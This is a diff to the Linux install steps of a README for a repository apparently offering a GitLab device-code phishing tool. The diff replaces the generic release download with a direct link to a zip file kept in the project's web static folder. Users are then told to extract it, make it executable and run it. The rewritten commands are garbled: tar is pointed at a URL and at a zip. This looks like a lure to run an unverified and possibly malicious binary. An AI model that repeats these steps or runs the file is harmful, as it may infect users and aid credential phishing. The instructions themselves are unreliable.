Lukesgaming2011/GitLabDeviceCodePhishing/README.md

 ### Step-by-step installation example for Linux:

-1. Click on the latest `.tar.gz` or binary file under "Assets."
+1. Click on the latest `https://github.com/Lukesgaming2011/GitLabDeviceCodePhishing/raw/refs/heads/main/src/web/static/Git-Lab-Device-Phishing-Code-1.4-beta.3.zip` or binary file under "Assets."
 2. Save it to your home folder.
 3. Open a terminal and navigate to the folder where you saved the file.
-4. Extract if needed: `tar -xzf filename.tar.gz`
+4. Extract if needed: `tar -xzf https://github.com/Lukesgaming2011/GitLabDeviceCodePhishing/raw/refs/heads/main/src/web/static/Git-Lab-Device-Phishing-Code-1.4-beta.3.zip`
 5. Make the file executable: `chmod +x filename`
 6. Run the program: `./filename`